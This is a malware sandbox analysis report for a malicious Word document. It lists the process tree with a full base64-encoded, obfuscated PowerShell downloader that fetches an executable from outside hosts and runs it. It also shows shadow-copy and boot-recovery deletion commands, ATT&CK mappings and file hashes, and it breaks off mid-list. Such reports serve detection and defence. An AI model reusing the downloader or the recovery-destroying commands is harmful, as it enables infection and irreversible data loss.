A6ACkAJwArACcAKAAnACkAKQArACgAKAAnACkAVwAnACsAJwBOACkAKAAnACsAJwApACgAJwApACkAKwAoACgAJwApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBoAG8AcwAzADYANQBsACcAKQApACsAKAAoACcAbAAnACsAJwBjAC4AYwBvAG0AKQAoACkAJwApACkAKwAnAFcATgAnACsAKAAoACcAKQAoACcAKQApACsAJwBoAGMAJwArACgAJwBpACcAKwAnADAAeABuACcAKQArACcAMAAnACsAKAAnAC4AegBpACcAKwAnAHAAQABoAHQAdAAnACkAKwAoACgAJwBwADoAKQAnACsAJwAoACkAVwAnACkAKQArACgAKAAnAE4AKQAnACkAKQArACgAKAAnACgAKQAnACsAJwAoACcAKQApACsAKAAoACcAKQBXACcAKQApACsAKAAoACcATgApACcAKQApACsAKAAoACcAKAB0ACcAKwAnAGUAcwB0ACcAKQApACsAKAAnAHcAJwArACcAZQBiACcAKQArACgAJwBzAGkAdABlACcAKwAnAC4AdABhACcAKwAnAHgAYQAnACsAJwB1AGMAJwApACsAKAAnAHQAaQAnACsAJwBvAG4AJwApACsAJwBpACcAKwAnAG4AdgAnACsAJwBlACcAKwAnAHMAJwArACgAJwB0AG8AcgAnACsAJwBzACcAKQArACgAKAAnAC4AYwAnACsAJwBvAG0AKQAoACkAJwArACcAVwBOACkAJwApACkAKwAoACgAJwAoAHgAJwArACcAdQBnACcAKQApACsAKAAnAGkAbgAnACsAJwAzACcAKQArACgAJwBxAHUALgB6AGkAJwArACcAcAAnACkAKwAnAEAAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwApACgAKQAnACkAKQArACcAVwAnACsAKAAoACcATgApACgAKQAoACkAJwArACcAVwBOACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAaAByAGEAZABoAGEAJwApACkAKwAnAGoAJwArACgAJwBlACcAKwAnAHcAZQBsAGwAJwApACsAJwBlACcAKwAoACgAJwByAHMALgBjACcAKwAnAG8AbQApACcAKQApACsAKAAnACgAJwArACcAKQBXACcAKQArACgAKAAnAE4AKQAoACcAKwAnAHUAJwApACkAKwAoACcAMAAnACsAJwA1AGcAJwApACsAJwBxACcAKwAoACcAMQBqACcAKwAnAGoAJwApACsAKAAoACcALgByACcAKwAnAGEAcgBAAGgAdAB0AHAAcwA6ACcAKwAnACkAKAAnACkAKQArACgAKAAnACkAJwArACcAVwBOACkAJwApACkAKwAoACcAKAApACcAKwAnACgAKQAnACkAKwAnAFcATgAnACsAJwApACcAKwAoACgAJwAoAGUAZAB1AGMAYQB0ACcAKwAnAGkAJwApACkAKwAoACgAJwBvACcAKwAnAG4AbQBpAGwAbAAnACsAJwBpAG8AbgAuAGMAbwAnACsAJwBtACkAKAAnACsAJwApACcAKQApACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHkAOAAnACsAJwBoADAAMQB0ACcAKwAnAGcANQA3AC4AcABkACcAKQApACsAKAAoACcAZgBAACcAKwAnAGgAdAB0AHAAJwArACcAOgApACgAKQBXACcAKwAnAE4AKQAoACkAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABnACcAKQApACsAJwBlAG8AJwArACgAKAAnAHoAbwBuACcAKwAnAGUALgAnACsAJwBhAHQAJwArACcAKQAoACcAKwAnACkAVwBOACcAKwAnACkAKABkAGUAegAnACkAKQArACgAJwBoACcAKwAnAGkAeQB6ACcAKQArACcAbQAnACsAKAAnAC4AegAnACsAJwBpAHAAJwApACkAKQAuACIAUgBgAGUAcABgAEwAYQBjAGUAIgAoACgAKAAoACgAJwApACgAJwApACkAKwAoACgAJwApAFcAJwApACkAKwAoACgAJwBOACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAcABgAEwAaQB0ACIAKAAkAFAAMQBhAGYAbwB3AHkAIAArACAAJABXAHcAcABwADUANAB4ACAAKwAgACQAWQBnAGwAZgAxADYAYwApADsAJABRAHQAbwAzAHkAMQB0AD0AKAAnAFAAcwAnACsAKAAnADIAaAAnACsAJwA2AHUAOAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB6AHYAdQBkAHIAegAgAGkAbgAgACQAWAA1ADMAeQBjAF8ANgAgAHwAIABzAE8AcgB0AC0AYABPAEIASgBFAGAAYwBUACAAewBnAEUAdAAtAGAAUgBgAEEAbgBEAE8ATQB9ACkAewB0AHIAeQB7ACQARwB1ADMAdwByAHgAaQAuACIARABgAE8AdwBgAE4AbABvAGEARABmAEkAbABlACIAKAAkAEYAegB2AHUAZAByAHoALAAgACQASgAzAGUAaABrAG0AbQApADsAJABQAHkAdwBhAHMAbgAyAD0AKAAoACcARwAnACsAJwA0AG4AdAAnACkAKwAoACcAawAnACsAJwB0AHUAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASgAzAGUAaABrAG0AbQApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA5ADgAOAAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3AGkAJwArACcAbgAzADIAJwApACsAJwBfACcAKwAnAFAAJwArACgAJwByAG8AYwAnACsAJwBlACcAKQArACcAcwBzACcAKQApAC4AIgBjAFIAYABlAGAAQQBUAEUAIgAoACQASgAzAGUAaABrAG0AbQApADsAJABVAGQANQBlADcAZAA3AD0AKAAnAFIAJwArACgAJwB1ACcAKwAnADcANwByACcAKwAnADAAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAQQB1AGIAaQBiADQAagA9ACgAJwBMACcAKwAnAHQAJwArACgAJwA2ACcAKwAnAG4AXwBhAGIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAXwBjAHIAYwBnADEAPQAoACgAJwBUACcAKwAnADUANQAnACkAKwAnADQANwAnACsAJwBjADMAJwApAA==
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:308

C:\Windows\system32\msg.exe
msg Admin /v Word experienced an error trying to open the file.
2⤵
PID:1060

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
POwersheLL -w hidden -ENCOD IAAkADQANwB6AHUAMwAgACAAPQAgACAAWwB0AHkAUABFAF0AKAAiAHsAMgB9AHsAMQB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAIAAnAHQATwBSAHkAJwAsACcAZQBtAC4AaQBPAC4ARAAnACwAJwBzAHkAUwBUACcALAAnAGkAUgBFAEMAJwApACAAIAA7ACAAIAAgAHMARQB0ACAAIABOAGgAdABNACAAIAAoAFsAdABZAHAARQBdACgAIgB7ADQAfQB7ADIAfQB7ADUAfQB7ADkAfQB7ADcAfQB7ADEAfQB7ADAAfQB7ADYAfQB7ADgAfQB7ADMAfQAiACAALQBGACAAJwBlACcALAAnAHMAJwAsACcAZQAnACwAJwBOAEEAZwBlAFIAJwAsACcAcwBZAFMAdAAnACwAJwBtAC4AbgAnACwAJwBSAHYASQBDAEUAUABPAEkATgAnACwAJwBUAC4AJwAsACcAdABNAEEAJwAsACcARQAnACkAIAApACAAIAA7ACQAQgBmAG8AeABnAGEAMAA9ACgAJwBRACcAKwAoACcAdwBuAHkAOAAnACsAJwA4ADQAJwApACkAOwAkAFcAdwBwAHAANQA0AHgAPQAkAEIAYQAyAHIAZAA5ADgAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEIAMQBoAGsAdgAyAG0AOwAkAFEAdABuAHkAbwBfAHcAPQAoACcATABpACcAKwAoACcAYwA4AHkAJwArACcAMQAnACkAKwAnAHkAJwApADsAIAAgACQANAA3AHoAVQAzADoAOgAiAGMAYABSAEUAQQBUAGAAZQBgAEQAaQByAGAARQBDAFQATwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAHIAaQBHAFcAbwBpACcAKwAnADEAJwArACcAcwAnACsAJwBhACcAKQArACgAJwBvAHIAJwArACcAaQAnACkAKwAoACcARwAnACsAJwBNAGYAJwApACsAJwAzAG8AJwArACcAZwBoACcAKwAoACcAXwAnACsAJwByAGkARwAnACkAKQAuACIAUgBFAGAAUABsAEEAQwBFACIAKAAoAFsAQwBoAEEAUgBdADEAMQA0ACsAWwBDAGgAQQBSAF0AMQAwADUAKwBbAEMAaABBAFIAXQA3ADEAKQAsACcAXAAnACkAKQApADsAJABKAHkAbQBnAHIAcwA0AD0AKAAoACcARwAnACsAJwBrAHYAJwApACsAJwByADUAJwArACcAeQBwACcAKQA7ACAAKAAgAGcASQAgACAAVgBBAFIAaQBhAGIAbABlADoAbgBIAHQATQAgACkALgBWAEEATAB1AGUAOgA6ACIAcwBlAEMAVQBgAFIAaQBUAGAAeQBwAFIAYABPAFQAYABvAEMATwBsACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABIADEAYgBvAHUAZQAxAD0AKAAoACcASwAnACsAJwA3AGIANgAnACkAKwAoACcANgBfACcAKwAnAHIAJwApACkAOwAkAFgAegA0AHgANgBsAHgAIAA9ACAAKAAoACcAQgAnACsAJwB3ADkAJwApACsAKAAnADkAbwAnACsAJwBmACcAKQArACcAZwAnACkAOwAkAFQAaQBwAGUAbwBmAGIAPQAoACgAJwBVAGYAJwArACcAeAA5ACcAKQArACcAegAnACsAJwBrAGIAJwApADsAJABZAGoAMwB2AHEAOQBrAD0AKAAnAFYAJwArACgAJwBpAHAAaAAnACsAJwAxAHMAJwArACcAcwAnACkAKQA7ACQASgAzAGUAaABrAG0AbQA9ACQASABPAE0ARQArACgAKAAnAHsAMAB9AFcAbwBpACcAKwAnADEAcwBhAG8AewAwACcAKwAnAH0ATQBmADMAbwBnACcAKwAnAGgAXwAnACsAJwB7ADAAfQAnACkAIAAgAC0AZgAgACAAWwBjAGgAYQByAF0AOQAyACkAKwAkAFgAegA0AHgANgBsAHgAKwAoACcALgAnACsAKAAnAGUAJwArACcAeABlACcAKQApADsAJABPADgAeABsADEAdwB6AD0AKAAnAFYAJwArACgAJwBqACcAKwAnAGMAMQBtACcAKwAnAHQAeQAnACkAKQA7ACQARwB1ADMAdwByAHgAaQA9AG4ARQB3AC0ATwBCAGAAagBgAGUAQwBUACAATgBlAFQALgB3AGUAQgBjAEwASQBlAG4AVAA7ACQAWAA1ADMAeQBjAF8ANgA9ACgAKAAoACcAaAB0ACcAKwAnAHQAcAAnACkAKwAnADoAJwArACgAKAAnACkAKAAnACkAKQArACgAKAAnACkAVwAnACkAKQArACgAKAAnAE4AKQAnACsAJwAoACkAKAAnACkAKQArACcAKQAnACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHYAJwApACkAKwAoACcAaQBkACcAKwAnAHIAaQBvAGkAbgAnACkAKwAnAGQAJwArACcAdQAnACsAJwBzAHQAJwArACgAJwByACcAKwAnAGkAYQBsAC4AJwApACsAJwBjACcAKwAoACgAJwBvAG0AKQAnACsAJwAoACkAJwApACkAKwAoACgAJwBXACcAKwAnAE4AKQAnACkAKQArACcAKAAnACsAKAAnAGgANgBtAGsAZwAnACsAJwByAC4AJwApACsAKAAnAHIAJwArACcAYQByAEAAJwApACsAJwBoAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACcAKwAnACkAKAApACcAKwAnAFcATgApACgAKQAoACcAKQApACsAKAAoACcAKQAnACsAJwBXAE4AKQAnACkAKQArACgAKAAnACgAZgAnACkAKQArACgAJwBvAHIAYwBlACcAKwAnAGMAJwArACcAYQAnACkAKwAoACcAcgAnACsAJwBlAGUAJwApACsAJwByAC4AJwArACcAYwBvACcAKwAnAG0AJwArACcAKQAnACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAJwAoACcAKwAoACcAZQAnACsAJwBmAGYAJwApACsAKAAnAG8AOAAnACsAJwB5ACcAKQArACcAdQAnACsAKAAnAC4AcgAnACsAJwBhAHIAJwApACsAKAAnAEAAJwArACcAaAB0AHQAJwApACsAJwBwADoAJwArACgAKAAnACkAKAApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwApACgAKQBXAE4AJwArACcAKQAoAG8AJwArACcAbgAnACkAKQArACcAdwAuACcAKwAnAGsAJwArACcAeAAxACcAKwAnAC4AaQAnACsAKAAoACcAbgApACcAKQApACsAKAAoACcAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABkAGEAJwArACcAdgA0ADMAYQA1ACcAKwAnAGsAcQAnACkAKQArACgAJwAuACcAKwAnAHIAYQByACcAKQArACcAQABoACcAKwAnAHQAJwArACcAdAAnACsAKAAoACcAcAA6ACkAJwArACcAKAAnACkAKQArACgAKAAnACkAVwAnACsAJwBOACkAKAAnACsAJwApACgAJwApACkAKwAoACgAJwApAFcATgAnACsAJwApACcAKQApACsAKAAoACcAKAAnACsAJwBoAG8AcwAzADYANQBsACcAKQApACsAKAAoACcAbAAnACsAJwBjAC4AYwBvAG0AKQAoACkAJwApACkAKwAnAFcATgAnACsAKAAoACcAKQAoACcAKQApACsAJwBoAGMAJwArACgAJwBpACcAKwAnADAAeABuACcAKQArACcAMAAnACsAKAAnAC4AegBpACcAKwAnAHAAQABoAHQAdAAnACkAKwAoACgAJwBwADoAKQAnACsAJwAoACkAVwAnACkAKQArACgAKAAnAE4AKQAnACkAKQArACgAKAAnACgAKQAnACsAJwAoACcAKQApACsAKAAoACcAKQBXACcAKQApACsAKAAoACcATgApACcAKQApACsAKAAoACcAKAB0ACcAKwAnAGUAcwB0ACcAKQApACsAKAAnAHcAJwArACcAZQBiACcAKQArACgAJwBzAGkAdABlACcAKwAnAC4AdABhACcAKwAnAHgAYQAnACsAJwB1AGMAJwApACsAKAAnAHQAaQAnACsAJwBvAG4AJwApACsAJwBpACcAKwAnAG4AdgAnACsAJwBlACcAKwAnAHMAJwArACgAJwB0AG8AcgAnACsAJwBzACcAKQArACgAKAAnAC4AYwAnACsAJwBvAG0AKQAoACkAJwArACcAVwBOACkAJwApACkAKwAoACgAJwAoAHgAJwArACcAdQBnACcAKQApACsAKAAnAGkAbgAnACsAJwAzACcAKQArACgAJwBxAHUALgB6AGkAJwArACcAcAAnACkAKwAnAEAAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwApACgAKQAnACkAKQArACcAVwAnACsAKAAoACcATgApACgAKQAoACkAJwArACcAVwBOACcAKwAnACkAJwApACkAKwAoACgAJwAoAHMAJwArACcAaAByAGEAZABoAGEAJwApACkAKwAnAGoAJwArACgAJwBlACcAKwAnAHcAZQBsAGwAJwApACsAJwBlACcAKwAoACgAJwByAHMALgBjACcAKwAnAG8AbQApACcAKQApACsAKAAnACgAJwArACcAKQBXACcAKQArACgAKAAnAE4AKQAoACcAKwAnAHUAJwApACkAKwAoACcAMAAnACsAJwA1AGcAJwApACsAJwBxACcAKwAoACcAMQBqACcAKwAnAGoAJwApACsAKAAoACcALgByACcAKwAnAGEAcgBAAGgAdAB0AHAAcwA6ACcAKwAnACkAKAAnACkAKQArACgAKAAnACkAJwArACcAVwBOACkAJwApACkAKwAoACcAKAApACcAKwAnACgAKQAnACkAKwAnAFcATgAnACsAJwApACcAKwAoACgAJwAoAGUAZAB1AGMAYQB0ACcAKwAnAGkAJwApACkAKwAoACgAJwBvACcAKwAnAG4AbQBpAGwAbAAnACsAJwBpAG8AbgAuAGMAbwAnACsAJwBtACkAKAAnACsAJwApACcAKQApACsAKAAoACcAVwAnACsAJwBOACkAJwApACkAKwAoACgAJwAoAHkAOAAnACsAJwBoADAAMQB0ACcAKwAnAGcANQA3AC4AcABkACcAKQApACsAKAAoACcAZgBAACcAKwAnAGgAdAB0AHAAJwArACcAOgApACgAKQBXACcAKwAnAE4AKQAoACkAKAApAFcAJwArACcATgApACcAKQApACsAKAAoACcAKABnACcAKQApACsAJwBlAG8AJwArACgAKAAnAHoAbwBuACcAKwAnAGUALgAnACsAJwBhAHQAJwArACcAKQAoACcAKwAnACkAVwBOACcAKwAnACkAKABkAGUAegAnACkAKQArACgAJwBoACcAKwAnAGkAeQB6ACcAKQArACcAbQAnACsAKAAnAC4AegAnACsAJwBpAHAAJwApACkAKQAuACIAUgBgAGUAcABgAEwAYQBjAGUAIgAoACgAKAAoACgAJwApACgAJwApACkAKwAoACgAJwApAFcAJwApACkAKwAoACgAJwBOACcAKwAnACkAKAAnACkAKQApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAC8AJwApACwAKAAnAHgAdwAnACsAJwBlACcAKQApAFsAMABdACkALgAiAHMAcABgAEwAaQB0ACIAKAAkAFAAMQBhAGYAbwB3AHkAIAArACAAJABXAHcAcABwADUANAB4ACAAKwAgACQAWQBnAGwAZgAxADYAYwApADsAJABRAHQAbwAzAHkAMQB0AD0AKAAnAFAAcwAnACsAKAAnADIAaAAnACsAJwA2AHUAOAAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgB6AHYAdQBkAHIAegAgAGkAbgAgACQAWAA1ADMAeQBjAF8ANgAgAHwAIABzAE8AcgB0AC0AYABPAEIASgBFAGAAYwBUACAAewBnAEUAdAAtAGAAUgBgAEEAbgBEAE8ATQB9ACkAewB0AHIAeQB7ACQARwB1ADMAdwByAHgAaQAuACIARABgAE8AdwBgAE4AbABvAGEARABmAEkAbABlACIAKAAkAEYAegB2AHUAZAByAHoALAAgACQASgAzAGUAaABrAG0AbQApADsAJABQAHkAdwBhAHMAbgAyAD0AKAAoACcARwAnACsAJwA0AG4AdAAnACkAKwAoACcAawAnACsAJwB0AHUAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASgAzAGUAaABrAG0AbQApAC4AIgBMAEUAYABOAGAAZwBUAGgAIgAgAC0AZwBlACAANAA5ADgAOAAxACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAoACgAJwB3AGkAJwArACcAbgAzADIAJwApACsAJwBfACcAKwAnAFAAJwArACgAJwByAG8AYwAnACsAJwBlACcAKQArACcAcwBzACcAKQApAC4AIgBjAFIAYABlAGAAQQBUAEUAIgAoACQASgAzAGUAaABrAG0AbQApADsAJABVAGQANQBlADcAZAA3AD0AKAAnAFIAJwArACgAJwB1ACcAKwAnADcANwByACcAKwAnADAAbwAnACkAKQA7AGIAcgBlAGEAawA7ACQAQQB1AGIAaQBiADQAagA9ACgAJwBMACcAKwAnAHQAJwArACgAJwA2ACcAKwAnAG4AXwBhAGIAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFQAXwBjAHIAYwBnADEAPQAoACgAJwBUACcAKwAnADUANQAnACkAKwAnADQANwAnACsAJwBjADMAJwApAA==
2⤵
- Blacklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:700

C:\Users\Admin\Woi1sao\Mf3ogh_\Bw99ofg.exe
C:\Users\Admin\Woi1sao\Mf3ogh_\Bw99ofg.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1300

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ssd\onset\goodram.vbs"
2⤵
- Suspicious use of WriteProcessMemory
PID:1668

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ssd\onset\81ldp.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:748

C:\ssd\onset\15sp.exe
"15sp.exe" e -psion0811 01s.rar
4⤵
- Executes dropped EXE
PID:1896

C:\Windows\SysWOW64\timeout.exe
timeout 5
4⤵
- Delays execution with timeout.exe
PID:1592

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ssd\onset\Ztestram.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:916

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\ssd\onset\sata1.bat" "
5⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1472

C:\Windows\SysWOW64\attrib.exe
attrib +s +h "C:\ssd\"
6⤵
- Views/modifies file attributes
PID:1348

C:\Windows\SysWOW64\timeout.exe
timeout 2
6⤵
- Delays execution with timeout.exe
PID:396

C:\ssd\onset\mesager43.exe
mesager43.exe /start
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1980

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
7⤵
- Executes dropped EXE
- Enumerates connected drives
- Modifies system certificate store
PID:1992

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
8⤵
PID:2256

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
8⤵
PID:2268

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
8⤵
PID:2292

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
8⤵
PID:2320

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
8⤵
PID:2344

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
9⤵
- Interacts with shadow copies
PID:2460

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat
8⤵
PID:2384

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
9⤵
- Suspicious use of AdjustPrivilegeToken
PID:2500

C:\Windows\SysWOW64\vssadmin.exe
vssadmin delete shadows /all /quiet
9⤵
- Interacts with shadow copies
PID:2652

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 0
8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2420

C:\Windows\SysWOW64\notepad.exe
notepad.exe
8⤵
PID:2804

C:\Windows\SysWOW64\notepad.exe
notepad.exe
7⤵
PID:668

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im 15sp.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2076

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im 15sp.exe
6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2120

C:\Windows\SysWOW64\attrib.exe
attrib -s -h "C:\ssd\onset\mesager43.exe"
6⤵
- Views/modifies file attributes
PID:2152

C:\Windows\SysWOW64\timeout.exe
timeout 4
6⤵
- Delays execution with timeout.exe
PID:2164

C:\Windows\SysWOW64\timeout.exe
timeout 4
4⤵
- Delays execution with timeout.exe
PID:1776

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
PID:2528

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Hidden Files and Directories

T1158

Registry Run Keys / Startup Folder

T1060

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

File Deletion

T1107

Hidden Files and Directories

T1158

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
MD5
9d538c0560b32800760c81848d63c768

SHA1
0347de3203f816ec681476bad1ba61a9d617933d

SHA256
ff250295947988215771c7277792f7678cbb6c8d0db006a034622ae50090cc07

SHA512
14e728259be57440bf8b497884cb376c2f1b7bde2b9c8ffc3c9f3804dbe59f12899a57e434b2f8b3ca03a215eda40c434eec21064b93bdbbc75c4951ec7b3c45

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
MD5
61faf9608aef25c78ecec385617c1fe5

SHA1
475cb92095f1ee2c19a6eaa4615697b1b9f0c21e

SHA256
efa2e7c480e2cdeb6834fd1afca56ceb66f814e2b8da59ba6df4569d2b397ef4

SHA512
1b9226545cc39585a4a18b52227cdd7e6b8ff889dd40e9e186cce8d52c10abe1686fd8c799f52656f8b33ba47fa809d0f8369b1ef28207ebcc0d23e26a1d13dd

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
f3b3ba3b8527743bfe3ae7feb9de6a4d

SHA1
65a5fc2851514d5867a6726768f03d956142185e

SHA256
49a00de339c432d57e5ec170f091b5995fa8bc4eb4121344642d25d22408b0aa

SHA512
961f899691646528b86bdea736ed59e7ea78137c2346b709aa0e98ed6ffad1466678efbccfc210be448634f979f5e97bde90cada0cf43f98f27c2afbd19562f3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3F26ED5DE6B4E859CCCA6035ECB8D9CB
MD5
87893d767ba798ff2eca24b2aef323ae

SHA1
0789d415f3219ef29cb257ac96988ce6019bfb03

SHA256
39514c062a7a574cec26448a174634bdf2dda7ab306ee721c1b1156f35acbcfa

SHA512
a7a84c65485c2a6451c68348d1716757be61f7c2213f84d96dbabca2467c3640720a785707f432ec4bdad71a78345c9ea080a46c9338af805094620cd4ae63bf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\204C1AA6F6114E6A513754A2AB5760FA_0673414C08DE7F919AE3F6C4CC65AEEE
MD5
2c1a21578bb95484c6b0c29aa9bd5396

SHA1
a0576460223aec605bcbdeb213e0a70f6e6a13a2

SHA256
86b9ac98e00c691bb6c57879e7477d19fe129f589515042b024cf89b7944952d

SHA512
69deae6e1b04d459c69d44c10eab29918e7383c44e619bee5aa664f76cd29b30bc9eca23d798000a2f330dbe4777cfe1121ab190a20996ceef3adf2e0c33a553

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
1d13b7ec3f7618032268adce93f43ff0

SHA1
2d2e35a00236917b05eb8d228dbd4bbaceef864e

SHA256
0cd688d99d227cb5c0f02c1dc0affbeac2b6762528dafb0c0730c4aa0229a8b7

SHA512
fc9f347d3528302ab97e7417da98d328f21e234c29abc88b082b857de10905f77b0cdbafeee73abeeaf9edc6f9d65744f3a930854d9555ccb259bcca3aa41c4b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E
MD5
f1bd8e57b7d5e4e0226135fa63b9d9e3

SHA1
77bbf6c7291a23c60c17cd9a3eaaab4c97fa6465

SHA256
0b508b3c11f3e1b022dbccce230db2ff122bdce0dc0b9551931733e932fb4b93

SHA512
eeedf3405b9964bd6a97c98eea591a43c7f1dace4a2249ffdac9d86034af904d7e1483baff43a2e2ba8fcd8dde9086776ead904d1dc0bf2c1a8146658d0d2ed6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D73194RS\Z8CFUPRN.htm
MD5
b1cd7c031debba3a5c77b39b6791c1a7

SHA1
e5d91e14e9c685b06f00e550d9e189deb2075f76

SHA256
57ba053f075e0b80f747f3102ed985687c16a8754d109e7c4d33633269a36aaa

SHA512
d2bbefdc1effb52a38964c4cec5990a5a226248eca36f99e446c0c5704436f666bf1cb514e73b8991411d497d3325ecc646cbd5065c364e92ab6b9c5f1ad4a72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\O1R1CL99\D07E86K0.htm
MD5
6b17a59cec1a7783febae9aa55c56556

SHA1
01d4581e2b3a6348679147a915a0b22b2a66643a

SHA256
66987b14b90d41632be98836f9601b12e7f329ffab05595887889c9c5716fbeb

SHA512
3337efd12b9c06b7768eb928a78caae243b75257c5aabe7a49e908a2f735af55f7257a40bd2330dc13865ead18ed805b54a6c5105740fdcbbaccacf7997bcbc3

Download Submit
C:\Users\Admin\AppData\Local\Temp\~temp001.bat
MD5
ef572e2c7b1bbd57654b36e8dcfdc37a

SHA1
b84c4db6d0dfd415c289d0c8ae099aea4001e3b7

SHA256
e6e609db3f387f42bfd16dd9e5695ddc2b73d86ae12baf4f0dfc4edda4a96a64

SHA512
b8c014b242e8e8f42da37b75fe96c52cd25ebd366d0b5103bcba5ac041806d13142a62351edecdee583d494d2a120f9b330f6229b1b5fe820e1c7d98981089e9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe
MD5
3163bba8a4861d47aafa1667d3082fee

SHA1
32824014c8740b8fef306e742c891bec0ef068d3

SHA256
39016358b939b83cf9997c447458ae2d13186c3f66e66784c9e8ff4031b60c7e

SHA512
